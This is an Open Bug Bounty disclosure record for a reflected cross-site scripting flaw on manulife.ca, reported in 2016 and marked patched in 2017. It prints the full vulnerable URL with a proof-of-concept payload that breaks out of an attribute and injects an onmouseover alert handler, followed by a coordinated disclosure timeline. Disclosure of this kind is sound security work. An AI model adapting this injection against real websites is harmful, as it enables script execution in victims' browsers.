manulife.ca XSS vulnerability

2016-09-12T23:35:00
ID OBB:181301
Type openbugbounty
Reporter ghozt
Modified 2017-02-04T05:58:00

Description

Vulnerable URL:
http://www.manulife.ca/wps/portal/manulifeca/Manulife.caHome/Manulife.ca/Generalsearch/!ut/p/b1/jZLJkqJAEIafpR_ApiiWwiMoILsFBSIXA21QUBSUtZ5-7I45zNbdk7eM-P6IzC-TSZiYSa5pXxzTtrhd08t7n4g7x1QUThN4oBNuCQyic6GNCHRU-AS2vwKSIEBg2MISmxxigQ7-L68bIFJJZEo8gBowhADwIrI5HXPf5TdMTLYALW_OoKpBj7t1IB23wYnuC_lOsO89coiL3o4XuFuxONUsV6iuwL-xTauNU5ZeFKySGVUCyU_agiym4wzGkRmI2bSbL7C9w6enkUN9N9HRXGwSJCTKNlkFKoJVcRm9hp_ISRDYLKXV3mywLnkRxokCUkOUZA1WEsjNrJ3Xt_ywxjfj3s52qgbdXkqHl5ef-4NPSv7Sn6yIf_r_G_jGX5Dfnw6T37F_XPED-OpMH8AXe2yfAPp0UB8whIkBvwvKqTbomfol9Q0S1i4pfQPQyHIAClyiDo7ru8EZTICG3KNUbKd0KAkHSlqyfov8UJGXlpw8JzKZpNhXr8OhegWvIpIQKyAgShByLOSYqAxFtHwYw3I9RfaJP13bM7YGtxS39sHVwtbcilHXzHY1b2jawwf13JvHHtcdhSqTZT1OyGWqeH5mSjLr-2elzbD3WDglpFieFcNm1Cg1mk7Qy4VPzBXi9cu6Lib5Mr5tLigXwKDxFp0IN93dcw50qLWCqPXUdPEYHA60FKi2y9-6RQZveCrR-sBplsfzbdyhsFFBd96bp6NrX1lu3meoiWft2Ndiro5W471_lru6VRlTV2HYWzZ_9iVW4o4vPwCbrazW/dl4/d5/L2dJQSEvUUt3QS80SmtFL1o2X01KQkIzRjU0MEdUM0QwSVRHM1VMN1QyTUUy/?query=%22+onmouseover%3Dalert%28%27OPENBUGBOUNTY%27%29+alt%3D%22ghozt
Details:

Description| Value
---|---
Patched:| Yes, on 03.02.2017
Latest check for patch:| 03.02.2017 14:44 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank:| 63551
VIP website status:| No
Check manulife.ca SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 September, 2016 23:35 GMT
Generic security notifications sent to website owner| 12 September, 2016 23:38 GMT
Vulnerability details disclosed by researcher| 20 September, 2016 00:12 GMT
Vulnerability patched by the website owner| 4 February, 2017 05:58 GMT